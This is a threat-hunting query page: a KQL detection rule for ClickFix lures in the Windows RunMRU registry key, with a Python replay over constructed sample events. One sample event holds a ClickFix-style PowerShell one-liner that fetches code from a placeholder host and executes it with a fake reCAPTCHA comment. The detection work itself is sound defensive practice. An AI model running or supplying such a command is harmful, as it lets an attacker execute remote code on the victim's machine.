Query Details
# *RunMRU ClickFix Detection*

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
| --- | --- | --- |
| T1012 | Query Registry | https://attack.mitre.org/techniques/T1012/ |

#### Description

This rule detects new or changed values under the per-user 'RunMRU' registry key, where Explorer records the commands a user enters in the Run dialog (Win+R). ClickFix lures talk the victim into pasting an attacker-supplied one-liner into that dialog, so a RunMRU entry with an unusually long command string (more than 50 characters) is a strong indicator that such a command was executed. Note that RunMRU is only a history list: a hit means a command was run once, not that anything was persisted.

#### Author

- **Name:** Benjamin Zulliger
- **GitHub:** https://github.com/benscha/KQLAdvancedHunting
- **LinkedIn:** https://www.linkedin.com/in/benjamin-zulliger/

#### References

- https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

## Defender XDR

```KQL
// ClickFix: Discovery of RunMRU Command
DeviceRegistryEvents
| where Timestamp >= ago(7d)
| where ActionType == "RegistryValueSet"
// Per-user Run dialog history; Explorer writes one lettered value per command plus an MRUList ordering value
| where RegistryKey has @"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
| extend RunCommand = RegistryValueData
| extend RunCommandLength = strlen(RunCommand)
// ClickFix payloads are long one-liners; tune the threshold against your own baseline of Run dialog usage
| where RunCommandLength > 50
// Exclusions: replace the placeholders with known-benign long commands from your environment
| where not(RunCommand has_any ("SAMPLE1", "SAMPLE2"))
| project Timestamp, DeviceName, InitiatingProcessAccountName, RegistryValueName, RunCommand, RunCommandLength
```
This query looks for suspicious writes to the Windows registry under the per-user 'RunMRU' key, which holds the history of commands entered in the Run dialog. It considers value-set events from the past week and flags any entry whose value data is longer than 50 characters, because the one-liners that ClickFix lures ask victims to paste into the Run dialog are far longer than the program names a user normally types there. The two exclusions ("SAMPLE1" and "SAMPLE2") are placeholders that match nothing until replaced with known-benign long commands from the environment. Because RunMRU is a history list rather than a persistence mechanism, a hit indicates that a command was executed, not that it will run again; the process that the pasted command spawned is what follow-up hunting should pivot to. The rule is tagged with MITRE ATT&CK technique T1012 (Query Registry).
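To make the rule's filters concrete without access to a Defender XDR tenant, the following Python replays the same logic over constructed DeviceRegistryEvents-style rows. This is an added example, not the query author's code; the row dicts use the real DeviceRegistryEvents column names the KQL reads (Timestamp, ActionType, RegistryKey, RegistryValueName, RegistryValueData), but the events themselves, the `example.invalid` host and the `_hkcu` path helper are constructed for the example. It also shows two details the query relies on implicitly: Explorer stores each Run-dialog command with a trailing `\1`, which `strlen` counts, and the short `MRUList` ordering value is written alongside every command but never crosses the length threshold.

```python
import re
from datetime import datetime, timedelta, timezone

RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
MIN_SUSPICIOUS_LEN = 50               # threshold from the KQL: strlen(RunCommand) > 50
EXCLUSIONS = ("SAMPLE1", "SAMPLE2")    # placeholders, exactly as in the original query

# Fixed reference time so the example is deterministic (constructed, not wall-clock).
NOW = datetime(2026, 2, 23, 12, 0, tzinfo=timezone.utc)


def _hkcu(subkey: str) -> str:
    """Build a HKEY_CURRENT_USER path the way the sample rows express it (assumption)."""
    return "HKEY_CURRENT_USER\\" + subkey


def _event(value_name: str, data: str, *, age: timedelta = timedelta(minutes=30),
           action: str = "RegistryValueSet", key: str = RUNMRU_KEY) -> dict:
    """Constructed DeviceRegistryEvents-style row (only the columns the rule reads)."""
    return {
        "Timestamp": NOW - age,
        "ActionType": action,
        "RegistryKey": _hkcu(key),
        "RegistryValueName": value_name,
        "RegistryValueData": data,
    }


# Explorer stores each Run-dialog command as a single-letter value whose data is the
# command followed by a literal "\1"; the MRUList value only records the letter order.
SAMPLE_EVENTS = [
    _event("a", "notepad\\1"),                                  # short, benign
    _event("MRUList", "cba"),                                   # ordering value, short
    _event("b", 'powershell -w hidden -c "iwr -useb http://example.invalid/x | iex" '
                '# "I am not a robot - reCAPTCHA Verification"\\1'),  # ClickFix-style lure
    _event("c", r"\\fileserver\share\SAMPLE1\deploy\install.cmd /quiet /log C:\temp\install.log"
                + "\\1"),                                       # long, but hits an exclusion
    _event("d", r"msiexec /i \\fileserver\share\deploy\agent-7.2.1.msi /qn /norestart" + "\\1",
           age=timedelta(days=9)),                              # long, but outside ago(7d)
    _event("Updater", r"C:\Users\u\AppData\Roaming\updater\svc.exe --hidden --poll 60",
           key=r"Software\Microsoft\Windows\CurrentVersion\Run"),  # long, but not RunMRU
    _event("e", "x" * 80, action="RegistryValueDeleted"),       # long, but not a value set
]


def strip_runmru_suffix(data: str) -> str:
    """Drop the trailing "\\1" Explorer appends to RunMRU entries, for reporting."""
    return data[:-2] if data.endswith("\\1") else data


def has_any_ci(text: str, terms) -> bool:
    """Approximation of KQL has_any(): case-insensitive match on whole terms.

    KQL's `has` is term-based (a term is a run of alphanumerics), so a plain
    substring test would be broader than the real operator; the lookarounds
    below keep the same word-boundary behaviour for these samples.
    """
    return any(
        re.search(r"(?<![A-Za-z0-9_])" + re.escape(t) + r"(?![A-Za-z0-9_])", text, re.IGNORECASE)
        for t in terms
    )


def run_rule(events, now=NOW, lookback=timedelta(days=7),
             min_len=MIN_SUSPICIOUS_LEN, exclusions=EXCLUSIONS):
    """Replay the KQL filters in order; return one dict per surviving row."""
    cutoff = now - lookback
    hits = []
    for ev in events:
        if ev["Timestamp"] < cutoff:                              # Timestamp >= ago(7d)
            continue
        if ev["ActionType"] != "RegistryValueSet":                # ActionType == "RegistryValueSet"
            continue
        if RUNMRU_KEY.lower() not in ev["RegistryKey"].lower():   # RegistryKey has @"...\RunMRU"
            continue
        data = ev["RegistryValueData"]                            # RunCommand = RegistryValueData
        if len(data) <= min_len:                                  # RunCommandLength > 50 (suffix counted, as in KQL)
            continue
        if has_any_ci(data, exclusions):                          # not(RunCommand has_any (...))
            continue
        hits.append({
            "RegistryValueName": ev["RegistryValueName"],
            "RunCommand": strip_runmru_suffix(data),
            "RunCommandLength": len(data),
        })
    return hits


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print(f'[{hit["RegistryValueName"]}] len={hit["RunCommandLength"]}: {hit["RunCommand"]}')
```

Run against the constructed rows, only value `b` (the ClickFix-style lure) survives: the benign and MRUList entries fail the length check, the `SAMPLE1` command is dropped by the exclusion, the old `msiexec` entry falls outside the lookback, the `Run` key write never matches the RunMRU path, and the deletion has the wrong ActionType. Clearing `exclusions` shows why the placeholders matter: the UNC install command then surfaces as a second hit, which is exactly the kind of long-but-legitimate Run-dialog usage the exclusion list is meant to absorb.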

Benjamin Zulliger
Released: February 23, 2026